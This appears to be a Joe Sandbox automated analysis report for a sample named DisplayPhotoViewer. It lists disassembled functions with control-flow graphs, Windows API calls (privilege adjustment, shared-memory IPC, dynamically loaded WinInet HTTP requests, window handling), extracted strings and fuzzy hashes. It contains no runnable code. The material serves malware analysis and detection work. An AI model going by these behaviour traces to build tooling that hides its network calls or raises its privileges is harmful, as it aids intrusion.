SetSecurityDescriptorSacl 721->731 722->688 724->719 725->724 727->702 728->727 735 1109911e-11099129 728->735 731->720 738 110991fb-1109920a 732->738 739 1109920c 732->739 743 11099130-11099134 735->743 736->737 744 110991ca-110991d4 737->744 745 110991c7-110991c8 LocalFree 737->745 738->732 738->739 746 1109920e-11099214 739->746 750 11099304-11099323 GetLastError * 2 call 1100d7e0 741->750 751 11099326-1109932e 741->751 742->741 748 11099150-11099152 743->748 749 11099136-11099138 743->749 744->719 745->744 755 11099225-1109927d 746->755 756 11099216-11099223 746->756 752 11099155-11099157 748->752 757 1109913a-11099140 749->757 758 1109914c-1109914e 749->758 750->751 753 11099330 751->753 754 11099336-11099347 CreateEventA 751->754 752->708 752->727 753->754 761 11099349-11099368 GetLastError * 2 call 1100d7e0 754->761 762 1109936b-11099373 754->762 755->716 756->746 756->755 757->748 763 11099142-1109914a 757->763 758->752 761->762 765 1109937b-1109938d CreateEventA 762->765 766 11099375 762->766 763->743 763->758 768 1109938f-110993ae GetLastError * 2 call 1100d7e0 765->768 769 110993b1-110993b9 765->769 766->765 768->769 771 110993bb 769->771 772 110993c1-110993d2 CreateEventA 769->772 771->772 773 110993f4-11099402 772->773 774 110993d4-110993f1 GetLastError * 2 call 1100d7e0 772->774 777 11099404-11099405 LocalFree 773->777 778 11099407-1109940f 773->778 774->773 777->778 780 11099411-11099412 LocalFree 778->780 781 11099414-1109941d 778->781 780->781 782 11099423-11099426 781->782 783 110994c7-110994d9 call 1100d7e0 781->783 782->783 785 1109942c-1109942f 782->785 783->719 785->783 787 11099435-11099438 785->787 787->783 788 1109943e-11099441 787->788 789 1109944c-11099468 CreateThread 788->789 790 11099443-11099449 GetCurrentThreadId 788->790 791 1109946a-11099474 789->791 792 11099476-11099480 789->792 790->789 791->719 793 1109949a-110994c5 SetEvent call 1100d7e0 call 110981c0 792->793 794 11099482-11099498 ResetEvent * 3 792->794 793->677 794->793
                                                                                                    APIs
                                                                                                      • Part of subcall function 11098130: GetCurrentProcess.KERNEL32(000F01FF,?,1102E7AA,00000000,00000000,00080000,218EC38C,00080000,00000000,00000000), ref: 1109815D
                                                                                                      • Part of subcall function 11098130: OpenProcessToken.ADVAPI32(00000000), ref: 11098164
                                                                                                      • Part of subcall function 11098130: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 11098175
                                                                                                      • Part of subcall function 11098130: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 11098199
                                                                                                    • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,218EC38C,00080000,00000000,00000000), ref: 11098F05
                                                                                                    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 11098F1E
                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 11098F29
                                                                                                    • GetVersionExA.KERNEL32(?), ref: 11098F40
                                                                                                    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 11098FAE
                                                                                                    • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 11098FC3
                                                                                                    • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 11098FD4
                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,1102E7AA,00000004,00000000,?,?), ref: 11099010
                                                                                                    • GetLastError.KERNEL32 ref: 1109901D
                                                                                                    • LocalFree.KERNEL32(?), ref: 11099046
                                                                                                    • LocalFree.KERNEL32(?), ref: 11099053
                                                                                                    • GetLastError.KERNEL32 ref: 11099070
                                                                                                    • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109908E
                                                                                                    • LocalFree.KERNEL32(?), ref: 110990B9
                                                                                                    • LocalFree.KERNEL32(?), ref: 110990C6
                                                                                                      • Part of subcall function 110980A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,11098F5E), ref: 110980A8
                                                                                                      • Part of subcall function 110980E0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 110980F4
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110990F2
                                                                                                    • LocalFree.KERNEL32(?), ref: 110991BB
                                                                                                    • LocalFree.KERNEL32(?), ref: 110991C8
                                                                                                    • _memset.LIBCMT ref: 110991E0
                                                                                                    • GetTickCount.KERNEL32 ref: 110991E8
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 11099294
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110992AF
                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 110992FB
                                                                                                    • GetLastError.KERNEL32 ref: 11099304
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109930B
                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 11099340
                                                                                                    • GetLastError.KERNEL32 ref: 11099349
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 11099350
                                                                                                    • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 11099386
                                                                                                    • GetLastError.KERNEL32 ref: 1109938F
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 11099396
                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 110993CB
                                                                                                    • GetLastError.KERNEL32 ref: 110993DA
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 110993DD
                                                                                                    • LocalFree.KERNEL32(?), ref: 11099405
                                                                                                    • LocalFree.KERNEL32(?), ref: 11099412
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 11099443
                                                                                                    • CreateThread.KERNEL32(00000000,00002000,Function_00098A10,00000000,00000000,00000030), ref: 1109945D
                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109948C
                                                                                                    • ResetEvent.KERNEL32(?), ref: 11099492
                                                                                                    • ResetEvent.KERNEL32(?), ref: 11099498
                                                                                                    • SetEvent.KERNEL32(?), ref: 1109949E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                    • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                    • API String ID: 3291243470-2792520954
                                                                                                    • Opcode ID: b29928ef36f4a526e7e0e8bfda600b7ab5ebfe87b8ec127c718a02ca3981d435
                                                                                                    • Instruction ID: c7e67fb3088867accc3e8c580180b1e24b3d2937ed75d1edbd7858024c42e2b0
                                                                                                    • Opcode Fuzzy Hash: b29928ef36f4a526e7e0e8bfda600b7ab5ebfe87b8ec127c718a02ca3981d435
                                                                                                    • Instruction Fuzzy Hash: 1B1282B5D0021E9FDB21DF65DCD4EAEB7B9FB88304F0085A9E51D97240E771AA848F60
                                                                                                    Function 11028090 Relevance: 89.8, APIs: 39, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 799 11028090-1102811e LoadLibraryA 800 11028121-11028126 799->800 801 11028128-1102812b 800->801 802 1102812d-11028130 800->802 803 11028145-1102814a 801->803 804 11028132-11028135 802->804 805 11028137-11028142 802->805 806 11028179-11028185 803->806 807 1102814c-11028151 803->807 804->803 805->803 808 1102822a-1102822d 806->808 809 1102818b-11028197 call 111583b1 806->809 810 11028153-1102816a GetProcAddress 807->810 811 1102816c-1102816f InternetCloseHandle 807->811 813 11028248-11028260 InternetOpenA 808->813 814 1102822f-11028246 GetProcAddress 808->814 816 1102819c-110281a3 809->816 810->811 815 11028171-11028173 SetLastError 810->815 811->806 818 11028284-11028290 _free 813->818 814->813 817 11028279-11028281 SetLastError 814->817 815->806 819 110281c4-110281d0 816->819 820 110281a5-110281be GetProcAddress 816->820 817->818 821 11028296-110282c7 call 11138650 call 11159650 818->821 822 1102850a-11028514 818->822 826 110281d2-110281db GetLastError 819->826 832 110281f1-110281f3 819->832 820->819 823 11028262-1102826a SetLastError 820->823 848 110282c9-110282cc 821->848 849 110282cf-110282e4 call 1107d140 * 2 821->849 822->800 825 1102851a 822->825 823->826 829 1102852c-1102852f 825->829 826->832 833 110281dd-110281ef _free call 111583b1 826->833 830 11028531-11028536 829->830 831 1102853b-1102853e 829->831 835 1102869f-110286a7 830->835 836 11028540-11028545 831->836 837 1102854a 831->837 839 11028210-1102821c 832->839 840 110281f5-1102820e GetProcAddress 832->840 833->832 845 110286b0-110286c3 835->845 846 110286a9-110286aa FreeLibrary 835->846 842 1102866f-11028674 836->842 843 1102854d-11028555 837->843 839->808 856 1102821e-11028227 839->856 840->839 847 1102826f-11028277 SetLastError 840->847 854 11028676-1102868d GetProcAddress 842->854 855 1102868f-11028695 842->855 852 11028557-1102856e GetProcAddress 843->852 853 11028574-11028582 843->853 846->845 847->808 848->849 868 110282e6-110282ea 849->868 869 110282ed-110282f9 849->869 852->853 858 1102862e-11028630 SetLastError 852->858 863 11028636-1102863d 853->863 866 11028588-1102858d 853->866 854->855 859 11028697-11028699 SetLastError 854->859 855->835 856->808 858->863 859->835 864 1102864c-1102866d call 110265b0 * 2 863->864 864->842 866->864 870 11028593-110285cf call 11107820 call 11026560 866->870 868->869 872 11028324-11028329 869->872 873 110282fb-110282fd 869->873 897 110285e1-110285e3 870->897 898 110285d1-110285d4 870->898 879 1102832b-1102833c GetProcAddress 872->879 880 1102833e-11028355 InternetConnectA 872->880 876 11028314-1102831a 873->876 877 110282ff-11028312 GetProcAddress 873->877 876->872 877->876 884 1102831c-1102831e SetLastError 877->884 879->880 886 11028381-1102838c SetLastError 879->886 881 110284f7-11028507 call 11157121 880->881 882 1102835b-1102835e 880->882 881->822 887 11028360-11028362 882->887 888 11028399-110283a1 882->888 884->872 886->881 892 11028364-11028377 GetProcAddress 887->892 893 11028379-1102837f 887->893 894 110283a3-110283b7 GetProcAddress 888->894 895 110283b9-110283d4 888->895 892->893 900 11028391-11028393 SetLastError 892->900 893->888 894->895 903 110283d6-110283de SetLastError 894->903 909 110283e1-110283e4 895->909 901 110285e5 897->901 902 110285ec-110285f1 897->902 898->897 899 110285d6-110285da 898->899 899->897 904 110285dc 899->904 900->888 901->902 905 110285f3-11028609 call 110ca1f0 902->905 906 1102860c-1102860e 902->906 903->909 904->897 905->906 911 11028610-11028612 906->911 912 11028614-11028625 call 11157121 906->912 913 110284f2-110284f5 909->913 914 110283ea-110283ef 909->914 911->912 919 1102863f-11028649 call 11157121 911->919 912->864 928 11028627-11028629 912->928 913->881 918 1102851c-11028529 call 11157121 913->918 915 110283f1-11028408 GetProcAddress 914->915 916 1102840a-11028416 914->916 915->916 921 11028418-11028420 SetLastError 915->921 927 11028422-1102843b GetLastError 916->927 918->829 919->864 921->927 930 11028456-1102846b 927->930 931 1102843d-11028454 GetProcAddress 927->931 928->843 934 11028475-11028483 GetLastError 930->934 931->930 932 1102846d-1102846f SetLastError 931->932 932->934 935 11028485-1102848a 934->935 936 1102848c-11028498 GetDesktopWindow 934->936 935->936 937 110284e2-110284e7 935->937 938 110284b3-110284cf 936->938 939 1102849a-110284b1 GetProcAddress 936->939 937->913 940 110284e9-110284ef 937->940 938->913 943 110284d1 938->943 939->938 941 110284d6-110284e0 SetLastError 939->941 940->913 941->913 943->909
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(WinInet.dll,218EC38C,74DF23A0,?,00000000), ref: 110280C5
                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102815F
                                                                                                    • InternetCloseHandle.WININET(000000FF), ref: 1102816D
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11028173
                                                                                                    • _malloc.LIBCMT ref: 11028197
                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110281B1
                                                                                                    • GetLastError.KERNEL32 ref: 110281D2
                                                                                                    • _free.LIBCMT ref: 110281DE
                                                                                                    • _malloc.LIBCMT ref: 110281E7
                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11028201
                                                                                                    • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102823B
                                                                                                    • InternetOpenA.WININET(11189200,?,?,000000FF,00000000), ref: 1102825A
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11028264
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11028271
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1102827B
                                                                                                    • _free.LIBCMT ref: 11028285
                                                                                                      • Part of subcall function 11158445: HeapFree.KERNEL32(00000000,00000000,?,11160F66,00000000,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 1115845B
                                                                                                      • Part of subcall function 11158445: GetLastError.KERNEL32(00000000,?,11160F66,00000000,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 1115846D
                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11028305
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1102831E
                                                                                                    • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11028331
                                                                                                    • InternetConnectA.WININET(000000FF,1118E468,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102834E
                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102836A
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11028383
                                                                                                    • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110283A9
                                                                                                    • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110283FD
                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11028563
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11028630
                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11028682
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11028699
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 110286AA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ErrorLast$Internet$FreeLibrary_free_malloc$CloseConnectHandleHeapLoadOpen
                                                                                                    • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                    • API String ID: 3053051410-913974648
                                                                                                    • Opcode ID: 9f7c83f99a8e9644367707dfacec3b69a1d60b86e7a6490af2cdb74f6cdce43c
                                                                                                    • Instruction ID: c0ebd284535d67ffb73796bde1d7fb53ff0c0bfd9c70396314c475a34027a813
                                                                                                    • Opcode Fuzzy Hash: 9f7c83f99a8e9644367707dfacec3b69a1d60b86e7a6490af2cdb74f6cdce43c
                                                                                                    • Instruction Fuzzy Hash: AF1271B4E402659BDB11CFA9CC88A9EFBF5FF88304F60855AF855E7244EB705A40CB61
                                                                                                    Function 1105DDB0 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 1113B180: GetLastError.KERNEL32(?,0BA6C1B8,000000FF,0BA62AB0), ref: 1113B1B5
                                                                                                      • Part of subcall function 1113B180: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0BA6C1B8,000000FF,0BA62AB0), ref: 1113B1C5
                                                                                                    • _fgets.LIBCMT ref: 1105DEE2
                                                                                                    • _strpbrk.LIBCMT ref: 1105DF49
                                                                                                    • _fgets.LIBCMT ref: 1105E04C
                                                                                                    • _strpbrk.LIBCMT ref: 1105E0C3
                                                                                                    • __wcstoui64.LIBCMT ref: 1105E0DC
                                                                                                    • _fgets.LIBCMT ref: 1105E155
                                                                                                    • _strpbrk.LIBCMT ref: 1105E17B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                                    • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                                    • API String ID: 716802716-1571441106
                                                                                                    • Opcode ID: 18b8d24e5b7d5bf9ed1c4d73fb00bd4be7562dfedbb41e30b8b76f30ca7c4587
                                                                                                    • Instruction ID: 740d06254583a6c1cca6c21937a67a7fef5d8953ebadc693a9e743206bd6f065
                                                                                                    • Opcode Fuzzy Hash: 18b8d24e5b7d5bf9ed1c4d73fb00bd4be7562dfedbb41e30b8b76f30ca7c4587
                                                                                                    • Instruction Fuzzy Hash: B3A2C375E0066A9FDB91CB64DC44BEFF7B5AB45305F0081D9E889A7280EB30AE45CF61
                                                                                                    Function 11130AA0 Relevance: 44.1, APIs: 16, Strings: 9, Instructions: 381windowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1857 11130aa0-11130ad5 1858 11130ad7 call 11027e30 1857->1858 1859 11130adc-11130af8 call 1112baf0 call 1112b5d0 1857->1859 1858->1859 1865 11130bd7-11130bde 1859->1865 1866 11130afe-11130b04 1859->1866 1869 11130c96-11130cac 1865->1869 1870 11130be4-11130beb 1865->1870 1867 11131006-11131021 call 11157561 1866->1867 1868 11130b0a-11130b6b call 11130640 IsWindow IsWindowVisible call 1113c600 call 11059e50 IsWindowVisible 1866->1868 1904 11130bcd 1868->1904 1905 11130b6d-11130b73 1868->1905 1880 11130cb2-11130cb9 1869->1880 1881 11130deb 1869->1881 1870->1869 1872 11130bf1-11130bf8 1870->1872 1872->1869 1875 11130bfe-11130c0d FindWindowA 1872->1875 1875->1869 1879 11130c13-11130c18 IsWindowVisible 1875->1879 1879->1869 1883 11130c1a-11130c21 1879->1883 1884 11130cbb-11130cc5 1880->1884 1885 11130cca-11130cea call 11059e50 1880->1885 1886 11130e31-11130e39 1881->1886 1887 11130ded-11130dfe 1881->1887 1883->1869 1891 11130c23-11130c48 call 11130640 IsWindowVisible 1883->1891 1884->1886 1885->1886 1901 11130cf0-11130d1f 1885->1901 1888 11130e71-11130e77 1886->1888 1889 11130e3b-11130e5b call 11059e50 1886->1889 1893 11130e00-11130e10 1887->1893 1894 11130e16-11130e2b 1887->1894 1897 11130e79-11130e85 call 11130640 1888->1897 1898 11130e88-11130e90 1888->1898 1912 11130e6b 1889->1912 1913 11130e5d-11130e69 call 1102b940 1889->1913 1891->1869 1916 11130c4a-11130c59 IsIconic 1891->1916 1893->1894 1894->1886 1897->1898 1908 11130ea2-11130ead call 11124fa0 1898->1908 1909 11130e92-11130e9d call 110678a0 1898->1909 1923 11130d21-11130d35 call 1107d140 1901->1923 1924 11130d3a-11130d4d call 111395a0 1901->1924 1904->1865 1905->1904 1914 11130b75-11130b8c call 1113c600 GetForegroundWindow 1905->1914 1925 11130eb8-11130ec0 1908->1925 1926 11130eaf-11130eb5 call 11129a80 1908->1926 1909->1908 1912->1888 1913->1888 1935 11130bba-11130bbc 1914->1935 1936 11130b8e-11130bb8 EnableWindow call 11129200 * 2 EnableWindow 1914->1936 1916->1869 1917 11130c5b-11130c76 GetForegroundWindow call 11129200 * 2 1916->1917 1959 11130c87-11130c90 EnableWindow 1917->1959 1960 11130c78-11130c7e 1917->1960 1923->1924 1948 11130d37 1923->1948 1949 11130d6a-11130d71 1924->1949 1950 11130d4f-11130d60 GetLastError call 1113c600 1924->1950 1933 11130ec2-11130ec5 1925->1933 1934 11130ece call 11129750 1925->1934 1926->1925 1942 11130ed3-11130ed9 1933->1942 1943 11130ec7-11130ecc call 11129820 1933->1943 1934->1942 1935->1904 1938 11130bbe-11130bc4 1935->1938 1936->1935 1938->1904 1947 11130bc6-11130bc7 SetForegroundWindow 1938->1947 1952 11130fca-11130fd5 call 11130380 1942->1952 1953 11130edf-11130ee5 1942->1953 1943->1942 1947->1904 1948->1924 1963 11130d73-11130d8e 1949->1963 1964 11130de4 1949->1964 1950->1949 1972 11130fd7-11130fe9 call 1105f8e0 1952->1972 1973 11130ff6-11130ffe 1952->1973 1956 11130f82-11130f8a 1953->1956 1957 11130eeb-11130ef3 1953->1957 1956->1952 1968 11130f8c-11130fba call 1103de00 call 1103de80 call 1103dea0 call 1103de60 1956->1968 1957->1952 1966 11130ef9-11130eff 1957->1966 1959->1869 1960->1959 1969 11130c80-11130c81 SetForegroundWindow 1960->1969 1971 11130d91-11130d9d 1963->1971 1964->1881 1966->1952 1974 11130f05-11130f1c call 111077a0 1966->1974 2007 11130fc4 1968->2007 2008 11130fbc-11130fc0 1968->2008 1969->1959 1976 11130db8-11130dc5 call 111395a0 1971->1976 1977 11130d9f-11130db3 call 1107d140 1971->1977 1972->1973 1987 11130feb-11130ff1 call 111385d0 1972->1987 1973->1867 1988 11130f41 1974->1988 1989 11130f1e-11130f3f call 110534a0 1974->1989 1976->1964 1995 11130dc7-11130de2 GetLastError call 1113c600 1976->1995 1977->1976 1992 11130db5 1977->1992 1987->1973 1997 11130f43-11130f80 call 1103ddc0 call 11046170 call 110461e0 call 1103de20 1988->1997 1989->1997 1992->1976 1995->1886 1997->1952 2007->1952 2008->2007
                                                                                                    APIs
                                                                                                    • IsWindow.USER32(0006029E), ref: 11130B21
                                                                                                    • IsWindowVisible.USER32(0006029E), ref: 11130B2F
                                                                                                    • IsWindowVisible.USER32(0006029E), ref: 11130B67
                                                                                                    • GetForegroundWindow.USER32 ref: 11130B82
                                                                                                    • EnableWindow.USER32(0006029E,00000000), ref: 11130B9C
                                                                                                    • EnableWindow.USER32(0006029E,00000001), ref: 11130BB8
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 11130BC7
                                                                                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11130C05
                                                                                                    • IsWindowVisible.USER32(00000000), ref: 11130C14
                                                                                                    • IsWindowVisible.USER32(0006029E), ref: 11130C44
                                                                                                    • IsIconic.USER32(0006029E), ref: 11130C51
                                                                                                    • GetForegroundWindow.USER32 ref: 11130C5B
                                                                                                      • Part of subcall function 11129200: ShowWindow.USER32(0006029E,11130A72,?,11130A72,00000007,?,?,?,?,?,00000000), ref: 1112920E
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 11130C81
                                                                                                    • EnableWindow.USER32(0006029E,00000001), ref: 11130C90
                                                                                                    • GetLastError.KERNEL32 ref: 11130D4F
                                                                                                    • GetLastError.KERNEL32 ref: 11130DC7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$ForegroundVisible$Enable$ErrorLast$FindIconicShow
                                                                                                    • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$Reactivate main window$Shell_TrayWnd$disableRunplugin
                                                                                                    • API String ID: 3497382234-2745087410
                                                                                                    • Opcode ID: 611af14f7b95485e78530a32c452103eadf0fe65c8cf43b16ac1f6c431f849a9
                                                                                                    • Instruction ID: 0b031c71293b8b8f0464ad689393229bc990e381230d2831e5b33f1e3b0a5d11
                                                                                                    • Opcode Fuzzy Hash: 611af14f7b95485e78530a32c452103eadf0fe65c8cf43b16ac1f6c431f849a9
                                                                                                    • Instruction Fuzzy Hash: D9D11378A526219FE712DFE4CD84B7EF7A5EBC071EF000178E91457288EB716840CBA1
